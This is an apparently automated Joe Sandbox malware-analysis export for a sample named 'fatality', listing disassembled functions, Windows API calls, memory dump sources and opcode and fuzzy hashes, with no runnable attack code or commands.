                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(?,?,00000000,?,00000000,-00000858,?,-00000858,00000000,00DE9C22,?,?,00000000,00000800,?), ref: 00DE97AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00DE9EC7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    APIs
                                                                      • Part of subcall function 00DEC27E: _wcslen.LIBCMT ref: 00DEC284
                                                                    • CreateDirectoryW.KERNELBASE(00000001,00000000,00000001,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA2D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2011010700-0
                                                                    • Opcode ID: 8da87d2a5b6a0296baf5291bab5df52016ba15fa79b1cec8636095735565bf61
                                                                    • Instruction ID: 6ce2c615ce5a361a8785fda5b6dcde9c0b4c904e39f5f53c4d5b12e5c8db22f4
                                                                    • Opcode Fuzzy Hash: 8da87d2a5b6a0296baf5291bab5df52016ba15fa79b1cec8636095735565bf61
                                                                    • Instruction Fuzzy Hash: 8301D831200296AAEF21BBBB4C09BFD3388DF0A780F088415F941E6092D754EA81C6B6
                                                                    APIs
                                                                    • ___security_init_cookie.LIBCMT ref: 00DFF530
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ___security_init_cookie
                                                                    • String ID:
                                                                    • API String ID: 3657697845-0
                                                                    • Opcode ID: f2e0224e0e726d32e4aa3d82ddd5216a9d94b50dd166366a6b3fe3b62ed2f5eb
                                                                    • Instruction ID: 0ce49f79701ee1246663aa46a8db197c498127c85b03406d7db756cf3a3e93b4
                                                                    • Opcode Fuzzy Hash: f2e0224e0e726d32e4aa3d82ddd5216a9d94b50dd166366a6b3fe3b62ed2f5eb
                                                                    • Instruction Fuzzy Hash: FD01253164438E9EDF24AFA4D8027FD77A0DF01325F2581B9E7407B6D2CA2059458774
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: afd14b9ba989ed73e49feb366239955cc36b5f9cf70e5bda64fa928fd91c1049
                                                                    • Instruction ID: ceb720864ddfecfcd29edb0dfd43979fc940db7a6481b606612ba8f5cfafc716
                                                                    • Opcode Fuzzy Hash: afd14b9ba989ed73e49feb366239955cc36b5f9cf70e5bda64fa928fd91c1049
                                                                    • Instruction Fuzzy Hash: 2201A5339015A8ABCF11BBA9CC919DEB736FF88750F054115F916B7112DA348D00C6B4
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 05415af416a40baccb396580cfde6191489eb57f717e2a4dc840883a44b4b73e
                                                                    • Instruction ID: 5c41b1cd256322ddc279dbdb5150f64593a82922160e34673eab906836d0d8aa
                                                                    • Opcode Fuzzy Hash: 05415af416a40baccb396580cfde6191489eb57f717e2a4dc840883a44b4b73e
                                                                    • Instruction Fuzzy Hash: 6AF0FC32601102AADB212A25DE04BAF37A88F91770F256115F9D8761D1DF70DDC281A0
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE5AC2
                                                                      • Part of subcall function 00DEB505: __EH_prolog.LIBCMT ref: 00DEB50A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: dfc02d8a5c8e1177de8128a8d8358b6174f6b3ce4380f8427df02985e4b5a253
                                                                    • Instruction ID: 5a5f062105d06cdaf01621ce87344e1e494808b9b7ec4613cc1e6752ee43df43
                                                                    • Opcode Fuzzy Hash: dfc02d8a5c8e1177de8128a8d8358b6174f6b3ce4380f8427df02985e4b5a253
                                                                    • Instruction Fuzzy Hash: 6C018C308106D8DAD725E7B8C0517EDFBA8DF64304F51848EA55AA3383CBB42B08D7B2
                                                                    APIs
                                                                    • SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,00DEA325,00000001,00DE70E6,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA501
                                                                      • Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2048169685-0
                                                                    • Opcode ID: 826c3b04781a4d6e4af2c412a36a9df615b08f018a0e1fdee81b4f63bc144d40
                                                                    • Instruction ID: 93600c41054fa88431c137e0faf32f581a925e4038ac079edf7d24e7da742903
                                                                    • Opcode Fuzzy Hash: 826c3b04781a4d6e4af2c412a36a9df615b08f018a0e1fdee81b4f63bc144d40
                                                                    • Instruction Fuzzy Hash: 3CF0E53120024ABBDF026F61DC01FDA3BACAF08385F488451B944E5160DB31DBD8DB70
                                                                    APIs
                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,00DE977F,?,?,00DE95CF,00000000,00E12641,000000FF), ref: 00DEA1F1
                                                                      • Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteFile_wcslen
                                                                    • String ID:
                                                                    • API String ID: 3339486230-0
                                                                    • Opcode ID: b2d56ddf0269e8ed028ac0f923f8be59568cf4d4521a5c5da563be8329cdba76
                                                                    • Instruction ID: c12ffe9f102fa70f5992f4ae4746c5e6bc93bf006ad487e90589b97edc372ffa
                                                                    • Opcode Fuzzy Hash: b2d56ddf0269e8ed028ac0f923f8be59568cf4d4521a5c5da563be8329cdba76
                                                                    • Instruction Fuzzy Hash: 09E092311402496BDB116F66DC45FEA379CAB0C381F488021BA44E2060EB61EE88DA74
                                                                    APIs
                                                                      • Part of subcall function 00DEA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,00DEA592,000000FF,?,?), ref: 00DEA6C4
                                                                      • Part of subcall function 00DEA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,00DEA592,000000FF,?,?), ref: 00DEA6F2
                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00DEA598
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Find$FileFirst$Close
                                                                    • String ID:
                                                                    • API String ID: 2810966245-0
                                                                    • Opcode ID: b352a4ae98fb25031dec87e8cd840f0b3ee83e6d135f718525b1c99eda66b682
                                                                    • Instruction ID: e2d3bbfbf0c0e3b1eefee61210e4fca51763ddd2a9a182a2933e8e329751e1a9
                                                                    • Opcode Fuzzy Hash: b352a4ae98fb25031dec87e8cd840f0b3ee83e6d135f718525b1c99eda66b682
                                                                    • Instruction Fuzzy Hash: AAF082310087D1AACB227BB98904BCB7BD0AF1A331F158A4DF1FD62196C27560989B33
                                                                    APIs
                                                                    • 73516BB0.GDIPLUS(00000010), ref: 00DFA62C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: 73516
                                                                    • String ID:
                                                                    • API String ID: 486175124-0
                                                                    APIs
                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00DFDD92
                                                                      • Part of subcall function 00DFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
                                                                      • Part of subcall function 00DFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
                                                                      • Part of subcall function 00DFB568: IsDialogMessageW.USER32(00010486,?), ref: 00DFB59E
                                                                      • Part of subcall function 00DFB568: TranslateMessage.USER32(?), ref: 00DFB5AC
                                                                      • Part of subcall function 00DFB568: DispatchMessageW.USER32(?), ref: 00DFB5B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                    • String ID:
                                                                    • API String ID: 897784432-0
                                                                    APIs
                                                                    • GetFileType.KERNELBASE(?,00DE97BE), ref: 00DE98C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID:
                                                                    • API String ID: 3081899298-0
                                                                    APIs
                                                                    • SetEndOfFile.KERNELBASE(?,00DE903E,?,?,-00000870,?,?,?,?,00000000,?,-00000974,?,?,?,?), ref: 00DE9F0C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: File
                                                                    • String ID:
                                                                    • API String ID: 749574446-0
                                                                    APIs
                                                                    • SetCurrentDirectoryW.KERNELBASE(?), ref: 00DFAC08
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory
                                                                    • String ID:
                                                                    • API String ID: 1611563598-0
                                                                    APIs
                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,00DE95D6,00000000,00E12641,000000FF), ref: 00DE963B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    APIs
                                                                    • CoUninitialize.COMBASE(?,?,?,?,00E12641,000000FF), ref: 00DFACB5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Uninitialize
                                                                    • String ID:
                                                                    • API String ID: 3861434553-0
                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00FC85C3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E5B000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00FC85C3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    • Opcode ID: 16845f2765d913e6d6b10ac949a95960ad886d91301aeb207ec133afdf4b0135
                                                                    • Instruction ID: c19b6f31ca59191b1779a96832bf42c957ea6ed0e5931414ab7b73bd82f3506e
                                                                    • Opcode Fuzzy Hash: 16845f2765d913e6d6b10ac949a95960ad886d91301aeb207ec133afdf4b0135
                                                                    • Instruction Fuzzy Hash: 72C22772E086288FDB25CE689D407EAB7B5EB84304F1555EAD84DF7280E775AEC18F40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog_swprintf
                                                                    • String ID: CMT$h%u$hc%u
                                                                    • API String ID: 146138363-3282847064
                                                                    • Opcode ID: cee769bf27b0aac634c9e030e48bc1873173704545bbfa8352f36242d836cc8f
                                                                    • Instruction ID: 4e4a4131ecd51fde9e4e5080e7a8e6083e811b841c88b1be13fd755ca1f57b48
                                                                    • Opcode Fuzzy Hash: cee769bf27b0aac634c9e030e48bc1873173704545bbfa8352f36242d836cc8f
                                                                    • Instruction Fuzzy Hash: 153291715142C4ABDB14EF75C899AF93BA5EF15300F08457DFD8A8B282DB749A49CB30
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE2874
                                                                    • _strlen.LIBCMT ref: 00DE2E3F
                                                                      • Part of subcall function 00DF02BA: __EH_prolog.LIBCMT ref: 00DF02BF
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE2F91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog$Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                    • String ID: CMT
                                                                    • API String ID: 1057911484-2756464174
                                                                    • Opcode ID: 2b03daf9effd2337e209c700e89d7d0cef98f1af2f52b9632b1de74bca58b1a9
                                                                    • Instruction ID: c8bc6c4644bbec0ff70a083ba916985b56da5c79199ffded88e6d587eb890252
                                                                    • Opcode Fuzzy Hash: 2b03daf9effd2337e209c700e89d7d0cef98f1af2f52b9632b1de74bca58b1a9
                                                                    • Instruction Fuzzy Hash: F062E5715002C58FDB19EF39C886AFA3BA5EF54300F08457EED9A8B282DB759945CB70
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ca42b9ec9b7586f9c51c3a7794b889afe196130f89528a14186d20df2addb04f
                                                                    • Instruction ID: bf18a6f392f1b78c5f902873918ec4d99e1a294345ce27fd26c8064502d679a7
                                                                    • Opcode Fuzzy Hash: ca42b9ec9b7586f9c51c3a7794b889afe196130f89528a14186d20df2addb04f
                                                                    • Instruction Fuzzy Hash: D1021C71E042199BDF18CFA9DC806ADF7F1EF88314F25916AD919F7384D731A9418B90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: gj
                                                                    • API String ID: 0-4203073231
                                                                    • Opcode ID: 27b7751e430c23b72ce657a6dbd8dca630702a874a4bcf78e46584d5b0e5b40e
                                                                    • Instruction ID: 10cbe9de03b84a5d480f46f215e78add758d6bcc856b14ba16c27566f5a9b341
                                                                    • Opcode Fuzzy Hash: 27b7751e430c23b72ce657a6dbd8dca630702a874a4bcf78e46584d5b0e5b40e
                                                                    • Instruction Fuzzy Hash: 5FC14872A183418FC354CF29D88065AFBE2BFC8308F59892EE998D7311D734E945CB96
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2056870207.0000000005250000.00000040.00001000.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_5250000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: b=q=
                                                                    • API String ID: 0-4069823217
                                                                    • Opcode ID: 1eea809ff47755f36f4d44d512b906b218fed69a3a009f451abeb400a6c7ed6b
                                                                    • Instruction ID: 82cd4cb51cb98265152c2b322181ba8d138886b9f3fe35800df9cd71db65d83d
                                                                    • Opcode Fuzzy Hash: 1eea809ff47755f36f4d44d512b906b218fed69a3a009f451abeb400a6c7ed6b
                                                                    • Instruction Fuzzy Hash: D2314631559397AFCB328E3884A13C7BFE2AF562013E65AAFC4C48B406D72154C7DB86
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 65c97f2002aada7871dd217f58149a810aa8f2f5665f5defa00c375d1f9d6c32
                                                                    • Instruction ID: 288d6bb1cd393a8da89a677d7b260b3f338001a5623474e109417b06ca9a4687
                                                                    • Opcode Fuzzy Hash: 65c97f2002aada7871dd217f58149a810aa8f2f5665f5defa00c375d1f9d6c32
                                                                    • Instruction Fuzzy Hash: 5962F7716047889FCB25CF38C4906B9BBE1AF95304F09C96DE9EA8B746D730E945CB21
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 769efa0c42816c00807ca40c49ef6cd4ce15f8447bc3c105b5c28df9457f4b61
                                                                    • Instruction ID: b5c2b3a818d7393cae4c6dc2af02d773df84de09aa14dc65c1d060026b1ea6b1
                                                                    • Opcode Fuzzy Hash: 769efa0c42816c00807ca40c49ef6cd4ce15f8447bc3c105b5c28df9457f4b61
                                                                    • Instruction Fuzzy Hash: FC62C8716083898FCB15CF2CC8909B9BBE1BF95304F19C96DE99A8B346D730E945CB25
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d3d0d950fd7afa08d42f26ba2b9a0a54462d0b528b3535cfd4003d3773fe981
                                                                    • Instruction ID: 362b6cee11cc8c558b0532ed570eefa3dcce8730565079bdfbb084b955b94128
                                                                    • Opcode Fuzzy Hash: 1d3d0d950fd7afa08d42f26ba2b9a0a54462d0b528b3535cfd4003d3773fe981
                                                                    • Instruction Fuzzy Hash: 43525A72A087018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 33cc3a881d4c49c829d537218a1bbe895fe1310e69b3dd98a05b13f72e7d8cfe
                                                                    • Instruction ID: 11cd2e1f06fc35f3b606611d720f8341c862b08d1a6ac6955ebc46e89953794d
                                                                    • Opcode Fuzzy Hash: 33cc3a881d4c49c829d537218a1bbe895fe1310e69b3dd98a05b13f72e7d8cfe
                                                                    • Instruction Fuzzy Hash: 4412E4B061870A9FC718CF28C890AB9B7E1FF94304F15892EEA96C7780D374E995CB55
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 00c0dcc9208b2d906f86d9d94c69198743e7a84fc5dd2667863a6fa7fdb56aac
                                                                    • Instruction ID: 655e507aea633073d962bdfd0a7e8609e2921f714c39e3404a187b70adc603d2
                                                                    • Opcode Fuzzy Hash: 00c0dcc9208b2d906f86d9d94c69198743e7a84fc5dd2667863a6fa7fdb56aac
                                                                    • Instruction Fuzzy Hash: 00F1AF716183818FC714EF2AC98462EBBE5EFC9314F146A2EF4C597262D630D946CF62
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
